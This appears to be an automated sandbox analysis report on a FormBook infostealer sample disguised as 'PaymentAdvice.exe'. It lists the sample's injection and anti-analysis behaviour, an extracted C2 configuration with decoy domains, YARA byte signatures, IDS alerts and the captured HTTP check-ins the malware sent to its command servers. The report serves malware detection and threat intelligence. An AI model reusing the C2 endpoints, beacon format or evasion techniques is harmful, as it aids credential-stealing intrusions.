Loading ...

Play interactive tourEdit tour

Analysis Report PaymentAdvice.exe

Overview

General Information

Sample Name:PaymentAdvice.exe
Analysis ID:383926
MD5:91937d3f9e93657c18129ff519b7f340
SHA1:d9acfebf2120d984d76bdf883094707305897691
SHA256:397fd95899f186c1385818c6b996f4cb410e266a84b2c134104d01675a822e27
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PaymentAdvice.exe (PID: 2852 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
    • PaymentAdvice.exe (PID: 5412 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 5964 cmdline: /c del 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.saturnkorp.net/c22b/"], "decoy": ["westendjanakpuri.com", "sylvianicolades.com", "xhvai.com", "vitalinfusionofarizona.com", "orangeecho.com", "middletonyork.net", "nature-powered.com", "securemanchester.com", "hispanicalinguablog.com", "vtz6whu5254xb1.xyz", "forceshutdown.com", "apointlessspace.net", "wildsoulsport.com", "baa-bee.com", "unmanglement.com", "njtiy.com", "misery-indexrain.com", "buybox.guru", "abolishlawinforcement.com", "healthforherraleigh.clinic", "merakart.com", "thetrentproject.com", "tobaccoroadinvitational.com", "sgdivergence.com", "skmoil.com", "bornforbetterthings.com", "tianyulian.com", "pwjol.com", "roab.store", "thebellabloom.com", "innerpeacehabits.com", "curtex.info", "worshipher.net", "puebloregentseniorliving.com", "profoundai.net", "yupinduoge.com", "draftsofsilence.com", "plataformaporelmarcanario.com", "grandrapidshemorrhoidclinic.com", "crossfut.net", "cobourgautoglass.com", "whowetrust.com", "anchor-little.com", "antiqollection.com", "wvregistration.com", "droplites.com", "creditiscrucial.com", "simdikikitap.com", "deltaeleveight.com", "webinast.com", "brandschutzglas.com", "brightsidebeans.com", "weatherdekniagara.com", "dajiangzhibo12.com", "transporteyflete.com", "dulzdude.com", "tmancar.com", "tristatecandlesupply.net", "thehealthierdonut.com", "francacheladesigns.com", "enerav.com", "highsiddityminks.com", "aitelco.net", "prulib.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.PaymentAdvice.exe.2680000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.PaymentAdvice.exe.2680000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.PaymentAdvice.exe.2680000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        2.2.PaymentAdvice.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.PaymentAdvice.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4mAvira URL Cloud: Label: malware
          Source: http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4mAvira URL Cloud: Label: malware
          Source: www.saturnkorp.net/c22b/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.saturnkorp.net/c22b/"], "decoy": ["westendjanakpuri.com", "sylvianicolades.com", "xhvai.com", "vitalinfusionofarizona.com", "orangeecho.com", "middletonyork.net", "nature-powered.com", "securemanchester.com", "hispanicalinguablog.com", "vtz6whu5254xb1.xyz", "forceshutdown.com", "apointlessspace.net", "wildsoulsport.com", "baa-bee.com", "unmanglement.com", "njtiy.com", "misery-indexrain.com", "buybox.guru", "abolishlawinforcement.com", "healthforherraleigh.clinic", "merakart.com", "thetrentproject.com", "tobaccoroadinvitational.com", "sgdivergence.com", "skmoil.com", "bornforbetterthings.com", "tianyulian.com", "pwjol.com", "roab.store", "thebellabloom.com", "innerpeacehabits.com", "curtex.info", "worshipher.net", "puebloregentseniorliving.com", "profoundai.net", "yupinduoge.com", "draftsofsilence.com", "plataformaporelmarcanario.com", "grandrapidshemorrhoidclinic.com", "crossfut.net", "cobourgautoglass.com", "whowetrust.com", "anchor-little.com", "antiqollection.com", "wvregistration.com", "droplites.com", "creditiscrucial.com", "simdikikitap.com", "deltaeleveight.com", "webinast.com", "brandschutzglas.com", "brightsidebeans.com", "weatherdekniagara.com", "dajiangzhibo12.com", "transporteyflete.com", "dulzdude.com", "tmancar.com", "tristatecandlesupply.net", "thehealthierdonut.com", "francacheladesigns.com", "enerav.com", "highsiddityminks.com", "aitelco.net", "prulib.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PaymentAdvice.exeVirustotal: Detection: 32%Perma Link
          Source: PaymentAdvice.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PaymentAdvice.exeJoe Sandbox ML: detected
          Source: 2.2.PaymentAdvice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.msiexec.exe.95a558.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.msiexec.exe.4b47960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.PaymentAdvice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PaymentAdvice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: msiexec.pdbGCTL source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\78a9904c70914141b6b07ca4fbdcf1ff\Loader\Loader\Release\u58v4wo87.pdb source: PaymentAdvice.exe, 00000000.00000002.238262176.0000000073CA2000.00000002.00020000.sdmp, ic4muy4.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: PaymentAdvice.exe, 00000000.00000003.229993167.000000001F100000.00000004.00000001.sdmp, PaymentAdvice.exe, 00000002.00000002.278191881.00000000009D0000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.502133269.0000000004610000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PaymentAdvice.exe, msiexec.exe
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.saturnkorp.net/c22b/
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.vtz6whu5254xb1.xyz
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.abolishlawinforcement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.webinast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.puebloregentseniorliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.brandschutzglas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.hispanicalinguablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.unmanglement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.plataformaporelmarcanario.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.dajiangzhibo12.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.saturnkorp.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.sgdivergence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
          Source: Joe Sandbox ViewASN Name: WORLD4YOUAT WORLD4YOUAT
          Source: C:\Windows\explorer.exeCode function: 3_2_070A7302 getaddrinfo,setsockopt,recv,
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.abolishlawinforcement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.webinast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.puebloregentseniorliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.brandschutzglas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.hispanicalinguablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.unmanglement.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.plataformaporelmarcanario.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.dajiangzhibo12.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.saturnkorp.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1Host: www.sgdivergence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.abolishlawinforcement.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
